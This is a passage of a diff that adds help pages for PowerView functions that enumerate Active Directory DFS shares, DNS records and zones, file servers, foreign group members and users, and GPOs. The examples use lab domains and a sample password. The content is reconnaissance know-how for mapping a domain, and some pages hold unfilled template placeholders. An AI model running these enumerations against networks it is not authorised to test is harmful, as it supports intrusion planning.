+## INPUTS

+

+## OUTPUTS

+

+### PowerView.Computer

+

+Outputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified.

+

+System.DirectoryServices.ActiveDirectory.DomainController

+

+If -LDAP isn't specified.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainDFSShare.md b/docs/Recon/Get-DomainDFSShare.md
new file mode 100755
index 0000000..ce33275
--- /dev/null
+++ b/docs/Recon/Get-DomainDFSShare.md
@@ -0,0 +1,202 @@
+# Get-DomainDFSShare

+

+## SYNOPSIS

+Returns a list of all fault-tolerant distributed file systems

+for the current (or specified) domain.

+

+Author: Ben Campbell (@meatballs__)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainSearcher

+

+## SYNTAX

+

+```

+Get-DomainDFSShare [[-Domain] <String[]>] [[-SearchBase] <String>] [[-Server] <String>]

+ [[-SearchScope] <String>] [[-ResultPageSize] <Int32>] [[-ServerTimeLimit] <Int32>] [-Tombstone]

+ [[-Credential] <PSCredential>] [[-Version] <String>]

+```

+

+## DESCRIPTION

+This function searches for all distributed file systems (either version

+1, 2, or both depending on -Version X) by searching for domain objects

+matching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively

+The server data is parsed appropriately and returned.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainDFSShare

+```

+

+Returns all distributed file system shares for the current domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainDFSShare -Domain testlab.local

+```

+

+Returns all distributed file system shares for the 'testlab.local' domain.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainDFSShare -Credential $Cred

+

+## PARAMETERS

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DomainName, Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: 3

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 4

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 5

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 6

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 7

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Version

+{{Fill Version Description}}

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 8

+Default value: All

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### System.Management.Automation.PSCustomObject

+

+A custom PSObject describing the distributed file systems.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainDNSRecord.md b/docs/Recon/Get-DomainDNSRecord.md
new file mode 100755
index 0000000..e444fd5
--- /dev/null
+++ b/docs/Recon/Get-DomainDNSRecord.md
@@ -0,0 +1,181 @@
+# Get-DomainDNSRecord

+

+## SYNOPSIS

+Enumerates the Active Directory DNS records for a given zone.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord

+

+## SYNTAX

+

+```

+Get-DomainDNSRecord [-ZoneName] <String> [-Domain <String>] [-Server <String>] [-Properties <String[]>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-FindOne] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Given a specific Active Directory DNS zone name, query for all 'dnsNode'

+LDAP entries using that zone as the search base.

+Return all DNS entry results

+and use Convert-DNSRecord to try to convert the binary DNS record blobs.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainDNSRecord -ZoneName testlab.local

+```

+

+Retrieve all records for the testlab.local zone.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainDNSZone | Get-DomainDNSRecord

+```

+

+Retrieve all records for all zones in the current domain.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local

+```

+

+Retrieve all records for all zones in the dev.testlab.local domain.

+

+## PARAMETERS

+

+### -ZoneName

+Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Domain

+The domain to query for zones, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to for the search.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Properties

+Specifies the properties of the output object to retrieve from the server.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Name,distinguishedname,dnsrecord,whencreated,whenchanged

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -FindOne

+Only return one result object.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: ReturnOne

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.DNSRecord

+

+Outputs custom PSObjects with detailed information about the DNS record entry.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainDNSZone.md b/docs/Recon/Get-DomainDNSZone.md
new file mode 100755
index 0000000..7065b26
--- /dev/null
+++ b/docs/Recon/Get-DomainDNSZone.md
@@ -0,0 +1,156 @@
+# Get-DomainDNSZone

+

+## SYNOPSIS

+Enumerates the Active Directory DNS zones for a given domain.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty

+

+## SYNTAX

+

+```

+Get-DomainDNSZone [[-Domain] <String>] [-Server <String>] [-Properties <String[]>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-FindOne] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+{{Fill in the Description}}

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainDNSZone

+```

+

+Retrieves the DNS zones for the current domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local

+```

+

+Retrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local.

+

+## PARAMETERS

+

+### -Domain

+The domain to query for zones, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to for the search.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Properties

+Specifies the properties of the output object to retrieve from the server.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -FindOne

+Only return one result object.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: ReturnOne

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.DNSZone

+

+Outputs custom PSObjects with detailed information about the DNS zone.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainFileServer.md b/docs/Recon/Get-DomainFileServer.md
new file mode 100755
index 0000000..34e9f00
--- /dev/null
+++ b/docs/Recon/Get-DomainFileServer.md
@@ -0,0 +1,200 @@
+# Get-DomainFileServer

+

+## SYNOPSIS

+Returns a list of servers likely functioning as file servers.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainSearcher

+

+## SYNTAX

+

+```

+Get-DomainFileServer [[-Domain] <String[]>] [[-LDAPFilter] <String>] [[-SearchBase] <String>]

+ [[-Server] <String>] [[-SearchScope] <String>] [[-ResultPageSize] <Int32>] [[-ServerTimeLimit] <Int32>]

+ [-Tombstone] [[-Credential] <PSCredential>]

+```

+

+## DESCRIPTION

+Returns a list of likely fileservers by searching for all users in Active Directory

+with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying

+the server names.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainFileServer

+```

+

+Returns active file servers for the current domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainFileServer -Domain testing.local

+```

+

+Returns active file servers for the 'testing.local' domain.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainFileServer -Credential $Cred

+

+## PARAMETERS

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DomainName, Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: 3

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: 4

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 5

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 6

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 7

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 8

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### String

+

+One or more strings representing file server names.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainForeignGroupMember.md b/docs/Recon/Get-DomainForeignGroupMember.md
new file mode 100755
index 0000000..9061774
--- /dev/null
+++ b/docs/Recon/Get-DomainForeignGroupMember.md
@@ -0,0 +1,238 @@
+# Get-DomainForeignGroupMember

+

+## SYNOPSIS

+Enumerates groups with users outside of the group's domain and returns

+each foreign member.

+This is a domain's "incoming" access.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-Domain, Get-DomainGroup

+

+## SYNTAX

+

+```

+Get-DomainForeignGroupMember [[-Domain] <String>] [-LDAPFilter <String>] [-Properties <String[]>]

+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Uses Get-DomainGroup to enumerate all groups for the current (or target) domain,

+then enumerates the members of each group, and compares the member's domain

+name to the parent group's domain name, outputting the member if the domains differ.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainForeignGroupMember

+```

+

+Return all group members in the current domain where the group and member differ.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainForeignGroupMember -Domain dev.testlab.local

+```

+

+Return all group members in the dev.testlab.local domain where the member is not in dev.testlab.local.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred

+

+Return all group members in the dev.testlab.local domain where the member is

+not in dev.testlab.local.

+binding to the secondary.dev.testlab.local for

+queries, and using the specified alternate credentials.

+

+## PARAMETERS

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Properties

+Specifies the properties of the output object to retrieve from the server.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SecurityMasks

+Specifies an option for examining security information of a directory object.

+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.ForeignGroupMember

+

+Custom PSObject with translated group member property fields.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainForeignUser.md b/docs/Recon/Get-DomainForeignUser.md
new file mode 100755
index 0000000..85b0092
--- /dev/null
+++ b/docs/Recon/Get-DomainForeignUser.md
@@ -0,0 +1,239 @@
+# Get-DomainForeignUser

+

+## SYNOPSIS

+Enumerates users who are in groups outside of the user's domain.

+This is a domain's "outgoing" access.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-Domain, Get-DomainUser

+

+## SYNTAX

+

+```

+Get-DomainForeignUser [[-Domain] <String>] [-LDAPFilter <String>] [-Properties <String[]>]

+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Uses Get-DomainUser to enumerate all users for the current (or target) domain,

+then calculates the given user's domain name based on the user's distinguishedName.

+This domain name is compared to the queried domain, and the user object is

+output if they differ.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainForeignUser

+```

+

+Return all users in the current domain who are in groups not in the

+current domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainForeignUser -Domain dev.testlab.local

+```

+

+Return all users in the dev.testlab.local domain who are in groups not in the

+dev.testlab.local domain.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred

+

+Return all users in the dev.testlab.local domain who are in groups not in the

+dev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and

+using the specified alternate credentials.

+

+## PARAMETERS

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Properties

+Specifies the properties of the output object to retrieve from the server.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SecurityMasks

+Specifies an option for examining security information of a directory object.

+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.ForeignUser

+

+Custom PSObject with translated user property fields.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainGPO.md b/docs/Recon/Get-DomainGPO.md
new file mode 100755
index 0000000..9d0a468
--- /dev/null
+++ b/docs/Recon/Get-DomainGPO.md
@@ -0,0 +1,354 @@
+# Get-DomainGPO

+

+## SYNOPSIS

+Return all GPOs or specific GPO objects in AD.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty

+

+## SYNTAX

+

+### None (Default)

+```

+Get-DomainGPO [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>]

+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]

+ [-Raw]

+```

+

+### ComputerIdentity

+```

+Get-DomainGPO [[-Identity] <String[]>] [-ComputerIdentity <String>] [-Domain <String>] [-LDAPFilter <String>]

+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]

+ [-Credential <PSCredential>] [-Raw]

+```

+

+### UserIdentity

+```

+Get-DomainGPO [[-Identity] <String[]>] [-UserIdentity <String>] [-Domain <String>] [-LDAPFilter <String>]

+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]

+ [-Credential <PSCredential>] [-Raw]

+```

+

+## DESCRIPTION

+Builds a directory searcher object using Get-DomainSearcher, builds a custom

+LDAP filter based on targeting/filter parameters, and searches for all objects

+matching the criteria.

+To only return specific properies, use

+"-Properties samaccountname,usnchanged,...".

+By default, all GPO objects for

+the current domain are returned.

+To enumerate all GPOs that are applied to

+a particular machine, use -ComputerName X.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainGPO -Domain testlab.local

+```

+

+Return all GPOs for the testlab.local domain

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainGPO -ComputerName windows1.testlab.local

+```

+

+Returns all GPOs applied windows1.testlab.local

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+"{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO

+```

+

+Return the GPOs with the name of "{F260B76D-55C8-46C5-BEF1-9016DD98E272}" and the display

+name of "Test GPO"

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon

+```

+

+### -------------------------- EXAMPLE 5 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainGPO -Credential $Cred

+

+## PARAMETERS

+

+### -Identity

+A display name (e.g.

+'Test GPO'), DistinguishedName (e.g.

+'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),

+GUID (e.g.

+'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g.

+'{F260B76D-55C8-46C5-BEF1-9016DD98E272}').

+Wildcards accepted.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DistinguishedName, SamAccountName, Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -ComputerIdentity

+Return all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.).

+

+```yaml

+Type: String

+Parameter Sets: ComputerIdentity

+Aliases: ComputerName

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -UserIdentity

+Return all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.).

+

+```yaml

+Type: String

+Parameter Sets: UserIdentity

+Aliases: UserName

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

